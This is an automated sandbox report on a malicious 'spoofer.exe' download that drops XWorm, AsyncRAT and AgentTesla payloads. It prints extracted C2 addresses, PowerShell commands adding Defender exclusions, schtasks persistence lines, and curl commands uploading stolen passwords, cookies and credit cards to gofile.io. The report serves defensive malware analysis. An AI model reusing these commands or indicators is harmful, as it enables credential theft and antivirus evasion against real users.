Resubmissions

22-07-2024 18:44

240722-xdxw3s1hmd 10

22-07-2024 18:37

240722-w9gpassanj 10

Analysis

  • max time kernel
    570s
  • max time network
    571s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240709-en
  • resource tags

    arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    22-07-2024 18:44

General

  • Target

    https://megawrzuta.pl/download/a37d5e686e4f49742da6a1037228b741.html

Malware Config

Extracted

Family

xworm

C2

185.254.97.15:1337

176.96.138.55:1338

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

Extracted

Family

asyncrat

Botnet

Default

C2

185.254.97.15:2024

Attributes
  • delay

    1

  • install

    true

  • install_file

    OperaGx.exe

  • install_folder

    %AppData%

aes.plain

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Detect Xworm Payload 4 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • AgentTesla payload 2 IoCs
  • Async RAT payload 1 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Looks for VMWare Tools registry key 2 TTPs 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Drops startup file 6 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 31 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 6 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 21 IoCs
  • NTFS ADS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Suspicious use of SendNotifyMessage 12 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://megawrzuta.pl/download/a37d5e686e4f49742da6a1037228b741.html
    1⤵
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1836
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffac213cb8,0x7fffac213cc8,0x7fffac213cd8
      2⤵
        PID:4332
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1944 /prefetch:2
        2⤵
          PID:2756
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 /prefetch:3
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:4532
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2620 /prefetch:8
          2⤵
            PID:828
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
            2⤵
              PID:1600
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
              2⤵
                PID:1272
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
                2⤵
                  PID:2152
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
                  2⤵
                    PID:4132
                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3152
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2064
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
                    2⤵
                      PID:3984
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
                      2⤵
                        PID:3532
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1
                        2⤵
                          PID:2472
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
                          2⤵
                            PID:3448
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
                            2⤵
                              PID:732
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
                              2⤵
                              • NTFS ADS
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3752
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
                              2⤵
                                PID:692
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5532 /prefetch:8
                                2⤵
                                  PID:5064
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6572 /prefetch:8
                                  2⤵
                                  • Modifies registry class
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:2892
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
                                  2⤵
                                    PID:1668
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
                                    2⤵
                                      PID:5040
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
                                      2⤵
                                        PID:2052
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
                                        2⤵
                                          PID:4680
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
                                          2⤵
                                            PID:5088
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
                                            2⤵
                                              PID:2196
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
                                              2⤵
                                                PID:2600
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
                                                2⤵
                                                  PID:2632
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5404 /prefetch:8
                                                  2⤵
                                                    PID:2392
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:1
                                                    2⤵
                                                      PID:5208
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 /prefetch:8
                                                      2⤵
                                                      • NTFS ADS
                                                      • Suspicious behavior: EnumeratesProcesses
                                                      PID:5484
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2496 /prefetch:2
                                                      2⤵
                                                        PID:2864
                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                      1⤵
                                                        PID:1428
                                                      • C:\Windows\System32\CompPkgSrv.exe
                                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                        1⤵
                                                          PID:5064
                                                        • C:\Windows\System32\rundll32.exe
                                                          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                          1⤵
                                                            PID:2012
                                                          • C:\Users\Admin\Downloads\7z2407-x64.exe
                                                            "C:\Users\Admin\Downloads\7z2407-x64.exe"
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Drops file in Program Files directory
                                                            • Modifies registry class
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:5712
                                                          • C:\Program Files\7-Zip\7zG.exe
                                                            "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Debug\" -spe -an -ai#7zMap28401:72:7zEvent28939
                                                            1⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:2660
                                                          • C:\Users\Admin\Downloads\Debug\spoofer.exe
                                                            "C:\Users\Admin\Downloads\Debug\spoofer.exe"
                                                            1⤵
                                                            • Looks for VirtualBox Guest Additions in registry
                                                            • Looks for VMWare Tools registry key
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            • Maps connected drives based on registry
                                                            • Drops file in Windows directory
                                                            • Enumerates system info in registry
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:4756
                                                            • C:\Windows\Fonts\Update.exe
                                                              "C:\Windows\Fonts\Update.exe"
                                                              2⤵
                                                              • Drops startup file
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:2692
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\Update.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1096
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1604
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\External_V3'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1480
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'External_V3'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:5944
                                                              • C:\Windows\System32\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "External_V3" /tr "C:\Users\Admin\AppData\Roaming\External_V3"
                                                                3⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:1472
                                                            • C:\Windows\Fonts\Ethone.exe
                                                              "C:\Windows\Fonts\Ethone.exe"
                                                              2⤵
                                                              • Drops startup file
                                                              • Executes dropped EXE
                                                              • Adds Run key to start application
                                                              • Suspicious behavior: GetForegroundWindowSpam
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              • Suspicious use of SetWindowsHookEx
                                                              PID:3336
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\Ethone.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1660
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ethone.exe'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:4720
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Kacper'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:3536
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Kacper'
                                                                3⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:1424
                                                              • C:\Windows\System32\schtasks.exe
                                                                "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Kacper" /tr "C:\Users\Admin\AppData\Roaming\Kacper"
                                                                3⤵
                                                                • Scheduled Task/Job: Scheduled Task
                                                                PID:4796
                                                            • C:\Windows\Fonts\1.exe
                                                              "C:\Windows\Fonts\1.exe"
                                                              2⤵
                                                              • Executes dropped EXE
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:676
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OperaGx" /tr '"C:\Users\Admin\AppData\Roaming\OperaGx.exe"' & exit
                                                                3⤵
                                                                  PID:3376
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    schtasks /create /f /sc onlogon /rl highest /tn "OperaGx" /tr '"C:\Users\Admin\AppData\Roaming\OperaGx.exe"'
                                                                    4⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:5572
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp45F8.tmp.bat""
                                                                  3⤵
                                                                    PID:5184
                                                                    • C:\Windows\system32\timeout.exe
                                                                      timeout 3
                                                                      4⤵
                                                                      • Delays execution with timeout.exe
                                                                      PID:5368
                                                                    • C:\Users\Admin\AppData\Roaming\OperaGx.exe
                                                                      "C:\Users\Admin\AppData\Roaming\OperaGx.exe"
                                                                      4⤵
                                                                      • Executes dropped EXE
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:5528
                                                                • C:\Windows\Fonts\tak.exe
                                                                  "C:\Windows\Fonts\tak.exe"
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:2392
                                                                  • C:\Windows\Fonts\tak.exe
                                                                    "C:\Windows\Fonts\tak.exe"
                                                                    3⤵
                                                                    • Drops startup file
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:5712
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
                                                                      4⤵
                                                                        PID:2668
                                                                        • C:\Windows\system32\curl.exe
                                                                          curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
                                                                          5⤵
                                                                            PID:6096
                                                                        • C:\Windows\system32\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
                                                                          4⤵
                                                                            PID:1232
                                                                            • C:\Windows\system32\curl.exe
                                                                              curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
                                                                              5⤵
                                                                                PID:1876
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
                                                                              4⤵
                                                                                PID:5784
                                                                                • C:\Windows\system32\curl.exe
                                                                                  curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
                                                                                  5⤵
                                                                                    PID:4984
                                                                                • C:\Windows\system32\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
                                                                                  4⤵
                                                                                    PID:1448
                                                                                    • C:\Windows\system32\curl.exe
                                                                                      curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
                                                                                      5⤵
                                                                                        PID:4220
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
                                                                                      4⤵
                                                                                        PID:5104
                                                                                        • C:\Windows\system32\curl.exe
                                                                                          curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
                                                                                          5⤵
                                                                                            PID:5112
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
                                                                                          4⤵
                                                                                            PID:4852
